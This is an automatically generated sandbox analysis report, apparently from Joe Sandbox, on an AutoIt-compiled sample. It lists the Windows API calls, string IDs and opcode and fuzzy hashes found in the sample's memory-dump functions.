                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                • Instruction ID: 22bed1b4251c5156d0ba27194fd8e70463bcf29bf3d975d9d38dd25e717d9f25
                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                • Instruction Fuzzy Hash: D431A570A001159FE718DF58C484A69F7A6FF99300F6886A5E88ACB395D731EDC1DB80
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: bbadebb149510d67ba7ee40583516f012edd7d6df8c88f2bf63206fa95218c82
                                                                                                                • Instruction ID: 38fcd873f4264ae54960eb29ebf669ee3cd77afa3a03432419a719b3ebe2fda2
                                                                                                                • Opcode Fuzzy Hash: bbadebb149510d67ba7ee40583516f012edd7d6df8c88f2bf63206fa95218c82
                                                                                                                • Instruction Fuzzy Hash: 07411574608395CFDB24DF25C454B1ABBE0FF85318F1988ACE8998B362C772E845CB52
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 8a7e5ca31b1e5e2c100db1863d29abd253cfc13b67f65ed040e568a79de5ea81
                                                                                                                • Instruction ID: b28be9c7707ee71f5df5b9af7bfd53511f8fef800994db5fc85166204c7ed998
                                                                                                                • Opcode Fuzzy Hash: 8a7e5ca31b1e5e2c100db1863d29abd253cfc13b67f65ed040e568a79de5ea81
                                                                                                                • Instruction Fuzzy Hash: AA212B72714A0DEBDB148F5AEC417AA7BB4FF94360F21852EE885C51A0EB3081D0D785
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 008E4BEF
                                                                                                                  • Part of subcall function 0090525B: __wfsopen.LIBCMT ref: 00905266
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008E4E0F
                                                                                                                  • Part of subcall function 008E4B6A: FreeLibrary.KERNEL32(00000000), ref: 008E4BA4
                                                                                                                  • Part of subcall function 008E4C70: _memmove.LIBCMT ref: 008E4CBA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1396898556-0
                                                                                                                • Opcode ID: b91caaaa751c2be00696d19a05ece36d2da79feeb0d21f242786f465e115e237
                                                                                                                • Instruction ID: 4ac02dcd1cfbbfa648f9b1a3cab93c958eb9547c6ffa913885d977d839eaa3c0
                                                                                                                • Opcode Fuzzy Hash: b91caaaa751c2be00696d19a05ece36d2da79feeb0d21f242786f465e115e237
                                                                                                                • Instruction Fuzzy Hash: 1411E73160024AABCF10AFB9C816FAE77A8FF85724F108429F559E7181DB7199009B52
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: cc0fbed0eefb790c70af42e6fbca75c870bb0b3f7122c6f6a6270bf435ef87db
                                                                                                                • Instruction ID: 71bcccb92e57274b32048c18c8f4e03c03e3bd5b493f895325b016e588ea6f65
                                                                                                                • Opcode Fuzzy Hash: cc0fbed0eefb790c70af42e6fbca75c870bb0b3f7122c6f6a6270bf435ef87db
                                                                                                                • Instruction Fuzzy Hash: EB2102B4A08345DFCB14DF24C844B2ABBE0BF89314F158968E99A97762D731E805CB92
                                                                                                                APIs
                                                                                                                • __lock_file.LIBCMT ref: 009048A6
                                                                                                                  • Part of subcall function 00908B28: __getptd_noexit.LIBCMT ref: 00908B28
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getptd_noexit__lock_file
                                                                                                                • String ID:
                                                                                                                • API String ID: 2597487223-0
                                                                                                                • Opcode ID: 78290b17ac6b859a48e5c2ba30794c816f39b489c9e8f01e7a13ae277f836282
                                                                                                                • Instruction ID: c3b97d1d70633227d717d975a0532f90209ac761ba1b245624312cc07bb7a518
                                                                                                                • Opcode Fuzzy Hash: 78290b17ac6b859a48e5c2ba30794c816f39b489c9e8f01e7a13ae277f836282
                                                                                                                • Instruction Fuzzy Hash: 7CF022B1A00608EFEF11AFB48C067AF37E4AF80324F098814FA209A1C1CB788D50DF41
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,?,009A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008E4E7E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 631344dd89e864a097939ef5a348049b38999ceb09af0e51a7a94ce77d729c16
                                                                                                                • Instruction ID: ad497b080ac83673bd8fe7d7d2d1f7e7cb2f657721566face09077fe3c33d93a
                                                                                                                • Opcode Fuzzy Hash: 631344dd89e864a097939ef5a348049b38999ceb09af0e51a7a94ce77d729c16
                                                                                                                • Instruction Fuzzy Hash: DDF0A970104742CFCB349F26E494822BBE0FF023393209A7EE1EAC2620C332A840DF00
                                                                                                                APIs
                                                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009007B0
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongNamePath_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2514874351-0
                                                                                                                • Opcode ID: e663975ee93749af13c65bcb7382c936c94810f4e979c5d30b77d57851f8aebe
                                                                                                                • Instruction ID: 7a5bc0025d0005bb6494f310f445935df3fd4943cd829a79a03d955ce6b46120
                                                                                                                • Opcode Fuzzy Hash: e663975ee93749af13c65bcb7382c936c94810f4e979c5d30b77d57851f8aebe
                                                                                                                • Instruction Fuzzy Hash: 81E0CD37A0412867C721D65DAC05FEA77DDDFC97A0F0441B5FD0CD7204D9609C8086D1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fread_nolock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2638373210-0
                                                                                                                • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                • Instruction ID: fb89c16492a57a2fe396245a7d86ed577cbf4565e60ec1d405ee7f3acefe9ad5
                                                                                                                • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                • Instruction Fuzzy Hash: DCE092B0104B009FD7389A24D800BA373E5AB05304F00081DF2AA83241EB6278418B59
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 01671FA3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                • Instruction ID: b5eea2cb64797c24a9942b06a3c0fa4ee84c765c4f4aab978fc176f063b5562d
                                                                                                                • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                • Instruction Fuzzy Hash: 13E08C30A05208EBDB20DEBC8D04AE973E8EB16320F004B56E906C37C0D7388A00E650
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 01671F73
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                • Instruction ID: 2a8710168668487c8ae311e7aec877937110756e4684706c93a68fe18334e105
                                                                                                                • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                                                                • Instruction Fuzzy Hash: 70D05E3090520CABCB10CAA99D0499973A89706320F004755F91583280D63599009790
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wfsopen
                                                                                                                • String ID:
                                                                                                                • API String ID: 197181222-0
                                                                                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                • Instruction ID: 10804b0fc9bada23ecda289e1cd933215f73579e647289bcd3ba0a44aeeccd8e
                                                                                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                • Instruction Fuzzy Hash: 89B0927644020C7BCE012A86EC02B4A3B199B81764F408020FB1C181B2A673A6A49A89
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 01673999
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                • Instruction ID: 1069bb883cb3ee0b9d9fa74cd50174a75b920e4438e4028b6b517163c93abcb7
                                                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                • Instruction Fuzzy Hash: 92E0BF7494010DEFDB00DFA4D9496ED7BB4FF04301F1005A1FD05D7680DB309E549A62
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 01673999
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                • Instruction ID: 24447719f1757f169ea49266462c5ccdb2f0b01853b67300a39db884618c3f2a
                                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                • Instruction Fuzzy Hash: AFE0E67494010DDFDB00DFB4D9496AD7BB4FF04301F100161FD01D2280D6309D509A62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0096CB37
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0096CB95
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0096CBD6
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0096CC00
                                                                                                                • SendMessageW.USER32 ref: 0096CC29
                                                                                                                • _wcsncpy.LIBCMT ref: 0096CC95
                                                                                                                • GetKeyState.USER32(00000011), ref: 0096CCB6
                                                                                                                • GetKeyState.USER32(00000009), ref: 0096CCC3
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0096CCD9
                                                                                                                • GetKeyState.USER32(00000010), ref: 0096CCE3
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0096CD0C
                                                                                                                • SendMessageW.USER32 ref: 0096CD33
                                                                                                                • SendMessageW.USER32(?,00001030,?,0096B348), ref: 0096CE37
                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0096CE4D
                                                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0096CE60
                                                                                                                • SetCapture.USER32(?), ref: 0096CE69
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0096CECE
                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0096CEDB
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0096CEF5
                                                                                                                • ReleaseCapture.USER32 ref: 0096CF00
                                                                                                                • GetCursorPos.USER32(?), ref: 0096CF3A
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0096CF47
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0096CFA3
                                                                                                                • SendMessageW.USER32 ref: 0096CFD1
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0096D00E
                                                                                                                • SendMessageW.USER32 ref: 0096D03D
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0096D05E
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0096D06D
                                                                                                                • GetCursorPos.USER32(?), ref: 0096D08D
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0096D09A
                                                                                                                • GetParent.USER32(?), ref: 0096D0BA
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0096D123
                                                                                                                • SendMessageW.USER32 ref: 0096D154
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0096D1B2
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0096D1E2
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0096D20C
                                                                                                                • SendMessageW.USER32 ref: 0096D22F
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0096D281
                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0096D2B5
                                                                                                                  • Part of subcall function 008E25DB: GetWindowLongW.USER32(?,000000EB), ref: 008E25EC
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0096D351
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                • API String ID: 3977979337-4164748364
                                                                                                                • Opcode ID: a1dc0513c605e7d5efb17dfd46fdc854f0e9dd4070d2f96a77b6c88162729c7c
                                                                                                                • Instruction ID: 4c740782a56f14182ab29c172fcbef883d42fee397a7b3cab045bdfe7133b16a
                                                                                                                • Opcode Fuzzy Hash: a1dc0513c605e7d5efb17dfd46fdc854f0e9dd4070d2f96a77b6c88162729c7c
                                                                                                                • Instruction Fuzzy Hash: FC4289B4608281AFD724CF38D858ABABBE9FF49314F14091DF5A5972B0C775D840EB92
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 009684D0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                • API String ID: 3850602802-328681919
                                                                                                                • Opcode ID: 2400bdd88607f8e3237b9e37d04bd3a621dd806014900825ad73f05812cfb472
                                                                                                                • Instruction ID: d9a03cb0e4e73fef0abdc9f4ff2f3a8e3c257501a26467a2a4403b1a634899bc
                                                                                                                • Opcode Fuzzy Hash: 2400bdd88607f8e3237b9e37d04bd3a621dd806014900825ad73f05812cfb472
                                                                                                                • Instruction Fuzzy Hash: 4612D071504209AFEB258F64DC49FAF7BB8EF86314F104629F915EA2E1DFB48941CB60
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$_memset
                                                                                                                • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                                                • API String ID: 1357608183-1798697756
                                                                                                                • Opcode ID: a46adf8d3ece52cd527725f29168436d42c3a31619d04eaeefceceeff892b49b
                                                                                                                • Instruction ID: 08614725470b630d31c624cd388700b61fd2c077c8ee137f2335593a5bd703ab
                                                                                                                • Opcode Fuzzy Hash: a46adf8d3ece52cd527725f29168436d42c3a31619d04eaeefceceeff892b49b
                                                                                                                • Instruction Fuzzy Hash: D993AE75A44219DBDB24CFA8C881BBDB7B1FF48310F25816AE955EB290E7749E81CF40
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(00000000,?), ref: 008E48DF
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0091D665
                                                                                                                • IsIconic.USER32(?), ref: 0091D66E
                                                                                                                • ShowWindow.USER32(?,00000009), ref: 0091D67B
                                                                                                                • SetForegroundWindow.USER32(?), ref: 0091D685
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0091D69B
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0091D6A2
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0091D6AE
                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0091D6BF
                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0091D6C7
                                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 0091D6CF
                                                                                                                • SetForegroundWindow.USER32(?), ref: 0091D6D2
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0091D6E7
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0091D6F2
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0091D6FC
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0091D701
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0091D70A
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0091D70F
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0091D719
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0091D71E
                                                                                                                • SetForegroundWindow.USER32(?), ref: 0091D721
                                                                                                                • AttachThreadInput.USER32(?,?,00000000), ref: 0091D748
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
